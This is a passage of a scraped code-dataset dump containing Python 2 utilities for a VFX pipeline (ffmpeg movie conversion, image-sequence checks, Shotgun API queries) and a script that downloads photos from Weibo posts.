dirName[-1] != \"/\":\n dirName += \"/\"\n dirList = os.listdir( dirName )\n\n files = glob.glob( dirName + str(\"*.dpx\"))\n files.extend( glob.glob( dirName + str(\"*.exr\") ))\n\n fileNameOnlyList = []\n idxList = 0\n\n for fName in files:\n fName_split = fName.split( dirName )[1]\n #print fName_split\n \n fNameWithoutExt= ''\n if \".dpx\" in fName_split:\n fNameWithoutExt = fName_split.split( \".dpx\" )[0]\n elif \".exr\" in fName_split:\n fNameWithoutExt = fName_split.split( \".exr\" )[0]\n else:\n continue\n\n # max padding 6\n numOfPadding = 0\n for pIdx in range(-1, -7, -1):\n if not fNameWithoutExt[pIdx].isdigit():\n break\n numOfPadding += 1\n \n fileNameOnly = fNameWithoutExt[0:-(numOfPadding)]\n\n isExistingName = False\n\n for fName in fileNameOnlyList:\n if fileNameOnly == fName:\n isExistingName = True\n break\n\n if not isExistingName:\n fileNameOnlyList.append( fileNameOnly )\n\n return fileNameOnlyList\n\n\ndef makeMov( dirName, fpsParam=24.0, outputPath='' ):\n\n # check foler exist\n if not os.path.isdir( dirName ):\n print \"Error@makeMov: %s not exist.\"%dirName\n return False\n \n # check file exist\n files = glob.glob( dirName + str('/') + str(\"*.dpx\"))\n files.extend( glob.glob( dirName + str('/') + str(\"*.exr\") ))\n \n if len(files) <= 0:\n print \"Error@makeMov: There is no file in %s.(dpx or exr)\"%dirName\n return False\n\n startFrame, endFrame = getMinMaxFrame( dirName )\n fileNameOnly = getFileNameOnlyList( dirName )\n \n if( len(fileNameOnly) <= 0 ):\n print \"Error@makeMov: There is no file in %s(dpx or exr)\"%dirName\n return False\n\n padding = getPadding( dirName )\n extension = getExtension( dirName )\n\n filePathName = dirName + str(\"/\") + fileNameOnly[0] + str(\"%0\") + str(padding) + str(\"d.\") + str(extension)\n fps = fpsParam #24\n codecFormat = str('rgb48le')\n\n if fileNameOnly[0][-1] == '.':\n onlyFileName = fileNameOnly[0][0:-1]\n else:\n onlyFileName = fileNameOnly[0]\n\n outFilePathName = ''\n if outputPath:\n outFilePathName = outputPath + str(\"/\") + onlyFileName + str(\".mov\")\n else:\n outFilePathName = dirName + str(\"/\") + onlyFileName + str(\".mov\")\n\n\n cmd = str('ffmpeg') + str(' ')\n cmd += str('-y') + str(' ')\n cmd += str('-start_number') + str(' ')\n cmd += str( startFrame ) + str(' ')\n cmd += str('-i') + str(' ')\n cmd += str( filePathName ) + str(' ')\n cmd += str(\"-c:v prores_ks -profile:v 4444 -vf format=\")\n cmd += str( codecFormat ) + str(' ')\n cmd += str(\"-sws_flags lanczos+accurate_rnd\") + str(' ')\n cmd += str('-r') + str(' ')\n cmd += str( fps ) + str(' ')\n cmd += str( outFilePathName )\n\n process = subprocess.Popen( cmd, shell=True )\n process.wait()\n\n if process.poll() is None:\n pass\n else:\n print \"Done\"\n\n return True\n\n\ndef checkDirExisting( path ):\n\n if not os.path.exists( path ):\n print \"Error@checkDirExisting: %s not exist.\"%path\n return False\n\n dirList = []\n dirList = getShotSubDir( path )\n\n for subdir in dirList :\n if not os.path.exists( subdir ):\n print \"Error@checkDirExisting: %s not exist.\"%subdir\n return False\n\n return True\n\n\ndef getEnvList():\n envList = []\n for key in os.environ.keys():\n envList.append( str(\"%30s %s \\n\" % (key,os.environ[key])) )\n \n return envList\n\ndef getEnvUser():\n userName = ''\n for key in os.environ.keys():\n if key == \"USER\":\n userName = os.environ[key]\n\n return userName\n\ndef CheckProjectName( rootPath, projectName ):\n dirList = os.listdir( rootPath )\n existProjFolder = False\n\n for dirName in dirList:\n dirFullPath = rootPath + '/' + dirName\n if os.path.isdir(dirFullPath) and dirName == projectName :\n return True\n else:\n existProjFolder = False\n else:\n existProjFolder = False\n\n return existProjFolder\n\n\ndef ReadDirectory( dirPath ):\n files = list()\n if not os.path.isdir( dirPath ):\n print \"Warning@ReadDirectory(): Invalid dirPath : \", dirPath\n return files\n\n path = dirPath + \"/\"+\"*.dpx\"\n tmpFiles = glob.glob(path)\n tmpFiles.sort()\n files.extend(tmpFiles)\n\n path = dirPath + \"/\"+\"*.jpg\"\n tmpFiles = glob.glob(path)\n tmpFiles.sort()\n files.extend(tmpFiles)\n\n path = dirPath + \"/\"+\"*.png\"\n tmpFiles = glob.glob(path)\n tmpFiles.sort()\n files.extend(tmpFiles)\n\n path = dirPath + \"/\"+\"*.tif\"\n tmpFiles = glob.glob(path)\n tmpFiles.sort()\n files.extend(tmpFiles)\n\n path = dirPath + \"/\"+\"*.exr\"\n tmpFiles = glob.glob(path)\n tmpFiles.sort()\n files.extend(tmpFiles)\n\n path = dirPath + \"/\"+\"*.tiff\"\n tmpFiles = glob.glob(path)\n tmpFiles.sort()\n files.extend(tmpFiles)\n\n return files\n\ndef ReadDirectoryWithExt( dirPath, extension ):\n files = list()\n if not os.path.isdir( dirPath ):\n print \"Warning@ReadDirectory(): Invalid dirPath : \", dirPath\n return files\n\n path = dirPath + \"/\" + \"*.\" + extension\n tmpFiles = glob.glob(path)\n tmpFiles.sort()\n files.extend(tmpFiles)\n\n return files\n\ndef CheckExstingImageSeq( pathToFrames ):\n hasSeqImages = False\n fileList = []\n # Case : dirOnly\n if os.path.isdir( pathToFrames ):\n fileList = ReadDirectory( pathToFrames )\n # Case : dir/fileName.ext\n else:\n dirName = os.path.dirname( pathToFrames )\n extName = pathToFrames.split('.')[-1]\n print \"dirName : \" + dirName \n print \"extension : \" + extName \n fileList = ReadDirectoryWithExt( dirName, extName )\n if len(fileList) > 0:\n hasSeqImages = True\n else:\n hasSeqImages = False\n return hasSeqImages\n\n\ndef GetNumOfFilesWithExtension( dirName, extName ):\n tmpFiles = glob.glob( dirName + \"/*.\" + extName )\n return len(tmpFiles)\n\ndef GetExtName( pathToFrames ):\n extName = \"*\"\n\n endName = pathToFrames.split(\".\")[-1]\n if endName == \"exr\": extName = \"exr\"\n elif endName == \"dpx\": extName = \"dpx\"\n elif endName == \"jpg\": extName = \"jpg\"\n elif endName == \"tif\": extName = \"tif\"\n elif endName == \"tiff\": extName = \"tiff\"\n elif endName == \"png\": extName = \"png\"\n else:\n dirNameOnly = pathToFrames\n if not os.path.isdir( pathToFrames ):\n dirNameOnly = os.path.dirname(pathToFrames)\n\n print \"dirNameOnly : \" + dirNameOnly\n maxNumOfFiles = 0\n numOfDpx = GetNumOfFilesWithExtension( dirNameOnly, \"dpx\" )\n if( numOfDpx > maxNumOfFiles ) : \n extName = \"dpx\"\n maxNumOfFiles = numOfDpx\n\n numOfExr = GetNumOfFilesWithExtension( dirNameOnly, \"exr\" )\n if( numOfExr > maxNumOfFiles ) : \n extName = \"exr\"\n maxNumOfFiles = numOfExr\n\n numOfJpg = GetNumOfFilesWithExtension( dirNameOnly, \"jpg\" )\n if( numOfJpg > maxNumOfFiles ) : \n extName = \"jpg\"\n maxNumOfFiles = numOfJpg\n\n numOfTif = GetNumOfFilesWithExtension( dirNameOnly, \"tif\" )\n if( numOfTif > maxNumOfFiles ) : \n extName = \"tif\"\n maxNumOfFiles = numOfTif\n\n numOfTiff = GetNumOfFilesWithExtension( dirNameOnly, \"tiff\" )\n if( numOfTiff > maxNumOfFiles ) : \n extName = \"tiff\"\n maxNumOfFiles = numOfTiff\n\n numOfPng = GetNumOfFilesWithExtension( dirNameOnly, \"png\" )\n if( numOfPng > maxNumOfFiles ) : \n extName = \"png\"\n maxNumOfFiles = numOfPng\n\n return extName\n\ndef GetUserName():\n cmd = \"who -q | egrep -v '# users'\"\n proc = subprocess.Popen(cmd, shell=True,stdout=subprocess.PIPE)\n\n if( proc!=None ):\n data = proc.communicate()[0]\n userNameList = data.split(\" \")\n if len(userNameList) > 0:\n return str(userNameList[0])\n else:\n print \"Error@GetUserName()-There is no name list.\"\n return None\n else:\n print \"Error@GetUserName()-Failed to run command.\"\n return None\n\ndef CreateDirectory( path ):\n \"\"\"!@brief Create directory.\n @param path The directory name to create.<br>\n @type (string)\n \"\"\"\n if( not os.path.isdir(path) ):\n try:\n os.makedirs(path)\n return True\n except OSError:\n print \"Error@CreateDirectory()-Failed to create directory : \" + path\n return False\n else:\n print \"Warning@CreateDirectory()-Alread exist directory : \" + path\n return True\n\ndef AddNewLineCharacter( inputStr ):\n maxCharacters = 35\n outStr = inputStr\n strSplit = inputStr.split(\" \")\n\n tmpStr = \"\"\n chrCount = 0\n for word in strSplit:\n chrCount += len(word)\n tmpStr += str(word)\n if chrCount > maxCharacters:\n tmpStr += str(\"\\n\")\n chrCount = 0\n else:\n tmpStr += str(\" \")\n\n if tmpStr:\n outStr = tmpStr\n return outStr\n\n\ndef GetFileList( dirPath, extName ):\n fileList = glob.glob( str(dirPath) + str(\"/*.\") + str(extName))\n return fileList\n\ndef GetFileList_v2( dirPath, extName, fileName ):\n fileList = glob.glob( str(dirPath) + str(\"/\") + str(fileName) + str(\"*.\") + str(extName))\n return fileList\n\ndef ConvertListToBase64List( listData ):\n base64List = []\n for ele in listData:\n base64List.append(base64.urlsafe_b64encode(str(ele)))\n return base64List \n\ndef ConvertListToStr( listData ):\n listStr = \"\"\n sizeOfList = len(listData)\n\n for i in range(sizeOfList):\n listStr += listData[i]\n if i != (sizeOfList-1):\n listStr += ','\n return listStr\n\ndef ConvertListToEncodedStr( listData ):\n listStr = \"\"\n sizeOfList = len(listData)\n\n for i in range(sizeOfList):\n listStr += base64.urlsafe_b64encode( str(listData[i]) )\n if i != (sizeOfList-1):\n listStr += ','\n return listStr\n\ndef ConvertEncodedStrToList( listStr ):\n listStrSplit = listStr.split(',')\n listData = []\n for ele in listStrSplit:\n listData.append( base64.urlsafe_b64decode(str(ele)))\n return listData\n\n\ndef ChangeName( pathToFrames, newFileStr, showName, shotName, versionName, debug=True ):\n \n # input\n fullPath = pathToFrames\n\n dirPath = os.path.dirname( fullPath )\n oriFileName = fullPath.split(dirPath)[-1]\n oriFileName = oriFileName[1:]\n extName = oriFileName.split('.')[-1]\n searchFileName = oriFileName.split('%')[0] + '*.' + extName\n\n if debug:\n print \"dirPath : \", dirPath\n print \"oriFileName : \", oriFileName\n print \"searchFileName : \", searchFileName\n\n searchFilePathName = dirPath + '/' + searchFileName\n fileList = glob.glob( searchFilePathName )\n \n newFileName = newFileStr\n newFileName = newFileName.replace(\"$(SHOW)\", showName )\n newFileName = newFileName.replace(\"$(SHOT)\", shotName )\n newFileName = newFileName.replace(\"$(VERSION)\", versionName)\n newFileName = newFileName.replace( \"//\", \"/\" )\n \n for i in range(len(fileList)):\n oriFilePath = fileList[i]\n oriFileNameOnly = oriFilePath.split('/')[-1].split('.')[0]\n oriFrameStr = oriFilePath.split('/')[-1].split('.')[1]\n oriExt = oriFilePath.split('/')[-1].split('.')[-1]\n #print oriFileNameOnly\n #print oriFrameStr\n #print oriExt\n \n newFileName = newFileName.replace( \"$(EXT)\", oriExt )\n newFileNameFinal = str(newFileName)%(int(oriFrameStr))\n newFilePathName = str(dirPath) + str('/') + str(newFileNameFinal)\n\n if debug:\n print \"before : \", oriFilePath\n print \"after : \", newFilePathName\n os.rename( oriFilePath, newFilePathName )\n\n # ex) BRB2400_dev_v001.%04d.exr\n oldNameSig = oriFileName\n newNameSig = newFileName\n\n return [oldNameSig, newNameSig]\n \n\ndef CheckExistImage( pathToFrames, debug=True ):\n # this version don't checking padding number\n\n # input\n fullPath = pathToFrames\n\n dirPath = os.path.dirname( fullPath )\n oriFileName = fullPath.split(dirPath)[-1]\n oriFileName = oriFileName[1:]\n extName = oriFileName.split('.')[-1]\n searchFileName = oriFileName.split('%')[0] + '*.' + extName\n fileNameOnly = oriFileName.split('%')[0]\n\n if debug:\n print \"dirPath : \", dirPath\n print \"oriFileName : \", oriFileName\n print \"searchFileName : \", searchFileName\n print \"extName : \", extName\n print \"fileNameOnly : \", fileNameOnly\n\n searchPath = dirPath + '/' + fileNameOnly + '*.' + extName\n fileNameList = glob.glob( searchPath )\n if len(fileNameList) > 0:\n return True\n return False\n\ndef GetMissingFramesInfoFromSeq(sequence):\n isGood = True\n keys = sequence.keys()\n infoPrintList = []\n for i in range(len(keys)):\n frames=sequence[keys[i]]\n frames.sort()\n #print frames\n for j in range(len(frames)):\n if j>0:\n if j < (len(frames)-1):\n derivative=frames[j]-frames[j-1]\n if(derivative>1):\n isGood = False\n missingStr = \"[ \"+ keys[i]+ \" ] missing frames [\"+str(frames[j-1]+1)+\" -> \"+str(frames[j]-1)+\"]\"\n print missingStr\n infoPrintList.append( missingStr )\n\n lengthStr = \"[ \"+keys[i]+\" ] length [ \"+str(len(frames))+\" ]\"\n print lengthStr\n infoPrintList.append( lengthStr )\n return infoPrintList, isGood\n\ndef GetMissingFramesInfo( dirPath ):\n files = os.listdir( dirPath )\n files.sort()\n sequences = dict()\n for i in range(len(files)):\n fileName = string.split(files[i],\".\")\n if(len(fileName)==3):\n if not (sequences.has_key(fileName[0])):\n listing = list()\n try:\n listing.append(string.atoi(fileName[1]))\n sequences[fileName[0]]=list()\n except:\n break\n\n if (sequences.has_key(fileName[0])):\n try:\n sequences[fileName[0]].append(string.atoi(fileName[1]))\n except:\n break\n #print sequences\n missingFrameStrList, isGood = GetMissingFramesInfoFromSeq(sequences)\n return missingFrameStrList, isGood\n\ndef GetFrameRangeInfo( dirName ):\n\n if dirName[-1] != \"/\":\n dirName += \"/\"\n dirList = os.listdir( dirName )\n\n files = glob.glob( dirName + str(\"*.dpx\"))\n files.extend( glob.glob( dirName + str(\"*.exr\") ))\n files.extend( glob.glob( dirName + str(\"*.jpg\") ))\n files.extend( glob.glob( dirName + str(\"*.png\") ))\n files.extend( glob.glob( dirName + str(\"*.tif\") ))\n files.extend( glob.glob( dirName + str(\"*.tiff\") ))\n files.sort()\n\n minFrame = 10000000\n maxFrame = -10000000\n\n for fName in files:\n fileFullName = fName.split( dirName )[1]\n #extName = fileFullName.split('.')[-1]\n numStr = fileFullName.split('.')[-2]\n #print numStr\n currentFrame = int(numStr)\n\n if currentFrame < minFrame :\n minFrame = currentFrame\n\n if currentFrame > maxFrame :\n maxFrame = currentFrame\n\n return [minFrame, maxFrame]\n\n\ndef Job_GetJobXml( onDebug=False ):\n p3 = subprocess.Popen([\"qstat\", \"-u\", \"*\", \"-xml\"], stdout=subprocess.PIPE)\n dataStr = ''\n if (p3 != None):\n dataStr = p3.communicate()[0]\n if onDebug : print dataStr\n return dataStr\n\ndef Job_GetOngoingJobNameList( xmlStr, onDebug ):\n\n root = ET.fromstring( xmlStr )\n\n jobNameList = []\n for jobList in root.findall('job_info/job_list'):\n jobName = jobList.find('JB_name').text\n jobNameList.append(jobName)\n if onDebug: print jobName\n\n return jobNameList\n\ndef Job_CheckingExistingJob( jobNameList, myJobName ):\n isExist = False\n\n if len(jobNameList) == 0:\n return False\n\n for job in jobNameList:\n if job.find( myJobName ) != -1:\n isExist = True\n return True\n\n return isExist\n\n\n\n\n\n" }, { "alpha_fraction": 0.5213838815689087, "alphanum_fraction": 0.5233832001686096, "avg_line_length": 33.5405387878418, "blob_id": "17e8bbfacb2335e00de2660ea709d5c73c2cec93", "content_id": "201728d5716f12d95c11b001f6d8c812e5091d16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11504, "license_type": "no_license", "max_line_length": 181, "num_lines": 333, "path": "/Shotgun_Utilities.py", "repo_name": "JimBae/ShotgunUtils", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n#-----------------------#\n# Shotgun_Utilities.py #\n#-----------------------#\n\nimport sys, string, os\nimport glob\nimport json\nimport subprocess\nimport array\nimport base64\nimport time\nimport datetime\nfrom datetime import date\nimport pickle\nimport string\nimport math\n\nimport OpenImageIO as oiio\nimport PyOpenColorIO as ocio\n\nfrom shotgun_api3.shotgun import Shotgun\n\n#=======================\n# Get shotgun\n#=======================\ndef SetShotgun():\n SERVER_PATH = ''\n SCRIPT_USER = ''\n SCRIPT_KEY = ''\n sg = Shotgun(SERVER_PATH,SCRIPT_USER, SCRIPT_KEY)\n return sg\n\n\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n#=============================\n# Project \n#=============================\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n\n#------------------------------\n# find a project given the name\n#------------------------------\ndef GetProject( sg, inputName ):\n return sg.find_one( \"Project\", [[\"name\", \"is\", inputName]], ['name'])\n\n#------------------------------\n# find project list\n#------------------------------\n#def GetProjectList( sg ):\n# return sg.find( \"Project\", [[\"name\", \"is\", \"\\*\"]] )\n\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n#=============================\n# Shot\n#=============================\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n\n#------------------------------\n# find shot list given project\n#------------------------------\ndef GetShotList( sg, sgProject ):\n return sg.find( \"Shot\", [[\"project\", \"is\", sgProject]], ['code'] )\n\n#------------------------------\n# find shot info given a shot\n#------------------------------\ndef GetShotInfo( sg, sgProject, shotId ):\n return sg.find_one( \"Shot\",\\\n [[\"project\", \"is\", sgProject],['id', 'is', int(shotId)]],\\\n ['code', 'sg_sequence', 'sg_status_list', \\\n 'sg_cut_in','sg_cut_out', 'sg_cut_duration',\\\n 'sg_working_duration', 'tag_list', 'sg_plates_received',\\\n 'sg_shot_description', 'description',\\\n 'sg_latest_client_note', 'sg_latest_note',\\\n 'sg_date_due', 'image'\n ] )\n\n#------------------------------\n# find shot info given a shot\n#------------------------------\ndef GetShotInfoThumbnail( sg, sgProject, shotId ):\n return sg.find_one( \"Shot\",\\\n [[\"project\", \"is\", sgProject],['id', 'is', int(shotId)]],\\\n ['code', 'image'] )\n\n\n#------------------------------\n# Update shot info of Shotgun\n#------------------------------\ndef UpdateShotInfo( sg, shotId, sgData ):\n print \"---------------------------\"\n print \"sg : \"\n print sg\n print \"shotId : \"\n print shotId\n print \"sgData : \"\n print sgData\n print \"---------------------------\"\n try:\n sg.update( 'Shot', int(shotId), sgData )\n print \"Done@UpdateShotInfo()-Success to update Shotgun\"\n return True\n except:\n print \"Error@UpdateShotInfo()-Failed to update Shotgun\"\n return False\n\n return True\n\n\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n#=============================\n# Version\n#=============================\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n\n#------------------------------\n# look for versions in a shot:\n#------------------------------\ndef GetVersion(sg, shotID):\n return sg.find('Version',[['entity','is',shotID]],['code','task','sg_path_to_frames'] )\n\n\n\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n#=============================\n# Note\n#=============================\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\ndef GetLatestNote(sg, sgProject, shotId ):\n #myFilters = [[ 'project', 'is',{'type':'Project','id': projectId}],\n myFilters = [[ 'project', 'is', sgProject],\n [ 'note_links', 'is', {'type':'Shot', 'id':shotId} ]]\n myFields = ['subject', 'note_links', 'content']\n mySorting = [{'column':'created_at', 'direction': 'desc'}]\n result = sg.find_one('Note', myFilters, myFields, mySorting)\n return result\n\ndef GetClientLatestNote(sg, sgProject, shotId ):\n #myFilters = [[ 'project', 'is',{'type':'Project','id': projectId}],\n myFilters = [[ 'project', 'is', sgProject],\n [ 'note_links', 'is', {'type':'Shot', 'id':shotId} ],\n [ 'sg_note_type', 'is', 'Client' ]]\n myFields = ['subject', 'note_links', 'content']\n mySorting = [{'column':'created_at', 'direction': 'desc'}]\n result = sg.find_one('Note', myFilters, myFields, mySorting)\n return result\n\ndef GetInternalLatestNote(sg, sgProject, shotId ):\n #myFilters = [[ 'project', 'is',{'type':'Project','id': projectId}],\n myFilters = [[ 'project', 'is', sgProject],\n [ 'note_links', 'is', {'type':'Shot', 'id':shotId} ],\n [ 'sg_note_type', 'is_not', 'Client' ]]\n myFields = ['subject', 'note_links', 'content']\n mySorting = [{'column':'created_at', 'direction': 'desc'}]\n result = sg.find_one('Note', myFilters, myFields, mySorting)\n return result\n\n\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n#=============================\n# Thumbnail\n#=============================\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n\ndef GetThumbnail(sg, shotId, filePath ):\n urlImage = 'https://my.shotgunstudio.com/thumbnail/Shot/' + str(shotId)\n try:\n outImage = sg.download_attachment({'url': urlImage}, filePath)\n return True\n except:\n return False\n\ndef GetThumbnail_v2(sg, sgProject, shotId, filePath ):\n\n entry = sg.find_one( \"Shot\",\\\n [[\"project\", \"is\", sgProject],['id', 'is', int(shotId)]],\\\n ['code', 'image'] )\n # Get image\n if(entry['image']):\n if(entry['image'] != None ):\n imageUrl = str(entry['image'])\n outImage = sg.download_attachment({'url': imageUrl}, filePath )\n return True\n else:\n print \"Error@GetThumbnail_v2.py::Failed to load thumbnail image.\"\n return False\n else:\n print \"Error@GEtThumbnail_v2.py::There is no thumbnail image attribute.\"\n return False\n\n#==================================\n# related with shotgun api\n#==================================\n#\n#def shotgunConnect( path, user, key ):\n# from shotgun_api3.shotgun import Shotgun\n# sg = Shotgun( path, user, key )\n# return sg\n#\n## find a project given the name\n#def sgProject( sg, inputName ):\n# return sg.find_one( \"Project\", [[\"name\", \"is\", inputName]]\n#\n#\n## find a shot given the name\n#def sgShot( sg, shot, project ):\n# return sg.find_one( 'Shot', [['code','is',shot],['project','is',project]],['sg_cut_in','sg_cut_out','sg_client_version','code'])\n#\n## expects a project in the proper naming, and a shot\n#def createShot( sg, proj, shot ):\n# filters = [['code','is','CGI']]\n# template = sg.find_one('TaskTemplate', filters)\n# project = sgProject(proj)\n#\n# data = { 'project': {\"type\":\"Project\",\"id\":project['id']},\n# 'code': shot,\n# 'task_template': template,\n# 'description': '',\n# 'sg_status_list': 'wtg' }\n#\n# result = sg.create( 'Shot', data )\n#\n# return result\n#\n#def sgNotesFind( sg, shotID ):\n# note = sg.find('Note',[['note_links','is',shotID]],['subject','content','created_at'],[{'field_name':'created_at','direction':'desc'}])\n# return note\n#\n#\n#def sgNotesFindLatest( sg, shotID ):\n# note = sg.find_one('Note',[['note_links','is',shotID]],['subject','content','created_at'],[{'field_name':'created_at','direction':'desc'}])\n# return note\n#\n#\n#def sgCreateNote(sg, project, shotID, subject, content):\n# # enter data here for a note to create\n# data = {'subject':subject,'content':content,'note_links':[shotID],'project':project}\n# # create the note\n# noteID = sg.create('Note',data)\n# return noteID\n#\n#\n## create a version\n#def sgCreateVersion( sg, project, shotID, verName, description, framePath, firstFrame, lastFrame, clientName='' ):\n# data = {'project':project,\n# 'code': verName,\n# 'description': description,\n# 'sg_path_to_frames': framePath,\n# 'frame_range': firstFrame + '-' + lastFrame,\n# #'sg_uploaded_movie': 'file.mov',\n# #'sg_first_frame': 1,\n# #'sg_last_frame': 100,\n# 'sg_status_list': 'rev',\n# 'entity': shotID}\n#\n# if clientName != '':\n# data['sg_client_name'] = clientName\n#\n# return sg.create('Version', data)\n#\n#\n##add a task version to the system\n#def sgCreateVersionTask(sg, project, shotID, verName, description, framePath, firstFrame, lastFrame, task):\n# filters = [['content','is',task],['entity','is',shot]]\n# taskID = sg.find_one('Task',filters)\n# data = {'project': project,\n# 'code': verName,\n# 'description': description,\n# 'sg_path_to_frames': framePath,\n# 'frame_range': firstFrame + '-' + lastFrame,\n# #'sg_uploaded_movie': '/Users/throb/Downloads/test.m4v',\n# #'sg_first_frame': 1,\n# #'sg_last_frame': 100,\n# 'sg_status_list': 'rev',\n# 'sg_task': taskID,\n# \n# 'entity': shotID} \n# # in case we're putting a client version in here we need this code.\n# # we are expecting a field called sg_client_name in the version table.\n# # please make sure you create this in the shotgun setup\n# #'user': {'type':'HumanUser', 'id':165} }\n# return sg.create('Version',data)\n#\n#\n## look for versions in a shot:\n#def sgVersionFind(sg, shotID):\n# return sg.find('Version',[['entity','is',shotID]],['code','task','sg_path_to_frames'])\n#\n#\n## search for the latest task given shotID and task info\n#def sgVersionFindLatestTask(sg, shotID, task):\n# # first look for the task and get the ID\n# filters = [['content','is',task],['entity','is',shotID]]\n# taskID = sg.find_one('Task',filters)\n# # then look for the latest \n# #version using the task ID. note that we need to use the [0] or else we're sending the array versus the hash\n# versionLatest = sg.find_one('Version',[['entity','is',shotID],['sg_task','is',taskID]],['code','sg_task','sg_path_to_frames'],[{'field_name':'created_at','direction':'desc'}])\n# return versionLatest\n#\n#\n## look for latest comp version\n### can deprecate since there is a way to get latest version including task type above\n#'''\n#def sgVersionFindLatestComp(sg, shotID):\n# # first look for the task and get the ID\n# filters = [['content','is','Comp'],['entity','is',shotID]]\n# taskID = sg.find('Task',filters)\n# # then look for the latest \n# #version using the task ID. note that we need to use the [0] or else we're sending the array versus the hash\n# versionComp = sg.find_one('Version',[['entity','is',shotID],['sg_task','is',taskID[0]]],['code','sg_task','sg_path_to_frames'],[{'field_name':'created_at','direction':'desc'}])\n# return versionComp\n#'''\n#\n### The following requires a field called \"client_version\" be added to shotgun\n#def sgVersionClientUpate (sg, shotID, version):\n# data = { 'sg_client_version': version}\n# result = sg.update('Shot', shotID['id'], data)\n# return result\n#\n## connect to shotgun and get the latest \"client version\" number\n#def sgGetClientVersion (sg, currShot):\n# '''sg = shotgunConnect()\n# sgproject = sgProject(sg, getJob(input))\n# currShot = getSeq(input) + '_' + getShot(input)\n# '''\n# sgshot = sgShot(sg, currShot)\n# try :\n# currentVersion = sgshot['sg_client_version']\n# except : \n# currentVersion = 0\n# return currentVersion\n\n\n" } ]
2
AnestLarry/photo_downloader
https://github.com/AnestLarry/photo_downloader
08b398db27caf97105a9c409a61efddee9ef3796
0439d705fc235599d8c830f13150e8b1b4398c7b
d53f2ff7e9a0487457beac2e3946b0c533e31600
refs/heads/master
2021-07-05T01:36:33.821787
2020-08-10T00:59:40
2020-08-10T00:59:40
148,917,103
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6416666507720947, "alphanum_fraction": 0.644444465637207, "avg_line_length": 26.69230842590332, "blob_id": "5c99b3bd60942a6883b622f3aec0c8897f8677b0", "content_id": "fc5c6fb3a61aff59fc26e65560420fcfae8f1e24", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 360, "license_type": "permissive", "max_line_length": 99, "num_lines": 13, "path": "/weibo.py", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "import subprocess as sp\nimport sys\n\np = sp.Popen([sys.executable, \"weibo_output.py\"],\n stdin=sp.PIPE, bufsize=1, universal_newlines=True,creationflags=sp.CREATE_NEW_CONSOLE)\nwhile True:\n keyword=input(\"\\nweibo url :\")\n if not keyword:\n continue\n p.stdin.write(keyword+\"\\n\")\n p.stdin.flush()\n if keyword==\"exit\":\n break\n" }, { "alpha_fraction": 0.5471698045730591, "alphanum_fraction": 0.5567330121994019, "avg_line_length": 28.534351348876953, "blob_id": "42150342808e964db0d5d4cc864138f60a464eb8", "content_id": "7a35e5f99ac98f0ca4c479a32c40787d1b7d4eb9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3869, "license_type": "permissive", "max_line_length": 94, "num_lines": 131, "path": "/weibo_output.py", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "# Version : 2.5\nimport re\nimport timelib\nimport Threadinglib\nimport json\nimport os\nfrom collections import deque\nimport requests\nimport threading\nimport sys\nfrom queue import Queue\n\n\ndef handle_url(url: str):\n return \"https://m.weibo.cn/status\"+url[url.rindex(\"/\"):]\n\n\ndef download_beta(path=\"\", iter=\"\"):\n while iter:\n iter_data = iter.popleft()\n try:\n with open(path+\"/\" + path + \"__\"+str(iter_data[0])+\".jpg\", \"wb\") as photo_file:\n photo = requests.get(iter_data[1], timeout=30).content\n photo_data = photo\n photo_file.write(photo_data)\n photo_file.flush()\n #photo_data = photo.read()\n except IOError:\n print(iter_data[0], \" file is downloaded.\")\n print(iter_data[0], \"file is downloaded.\")\n\n\ndef repair(path):\n import os\n print(path+\"/\"+path+\"_url.txt\")\n with open(path+\"/\"+path+\"_url.txt\", \"r\") as url_file:\n url = handle_url(json.loads(url_file.read())[\"mobile\"])\n res = requests.get(url, timeout=30)\n txt: str = res.text\n jpg_list = get_jpg_list(txt)\n if not jpg_list:\n print(jpg_list)\n raise \"not url in it\"\n jpg_list_emu = list()\n for i in enumerate(jpg_list):\n jpg_list_emu.append([i[0]+1, \"http://wx3.sinaimg.cn/large/\"+i[1]])\n re_download = []\n for i in jpg_list_emu:\n if not os.path.exists(path+\"/\" + path + \"__\"+str(i[0])+\".jpg\"):\n re_download += [i]\n re_download_de_iterator = deque(re_download)\n print(re_download_de_iterator)\n @timelib.Timelog\n def repair_now():\n Threadinglib.Delay_Threading_To_Exit(Threadinglib.Multithreading_Run(\n [download_beta]*3, [[path, re_download_de_iterator]]*3))\n\n\ndef get_jpg_list(txt: str):\n jpg_list = re.compile(\n '\\\"url\\\"\\: \\\"https\\://wx[0-9]\\.sinaimg\\.cn/large/([./A-z0-9]*)\\\",', re.S).findall(txt)\n print(jpg_list)\n return jpg_list\n\n\ndef log(path, data):\n try:\n if data.replace(\"\\n\", \"\"):\n open(path+\"/\"+path+\"__log.log\", \"a\").write(data)\n print(\"log succ\")\n except IOError:\n print(\"Error: \"+str(IOError))\n\n\ndef Main(key: str):\n if key[:4] == \"http\":\n try:\n url = handle_url(key[:key.index(\"?\")])\n key = key[:key.index(\"?\")]\n except:\n url = handle_url(key)\n else:\n repair(key)\n return None\n txt = requests.get(url, timeout=10)\n txt = txt.text\n jpg_list = get_jpg_list(txt)\n if not jpg_list:\n return None\n jpg_list_emu = list()\n logdata = dict()\n for i in enumerate(jpg_list):\n jpg_list_emu.append([i[0]+1, \"http://wx3.sinaimg.cn/large/\" + i[1]])\n logdata[i[0]+1] = \"http://wx3.sinaimg.cn/large/\" + i[1]\n jpg_url_de_iterator = deque(jpg_list_emu)\n\n 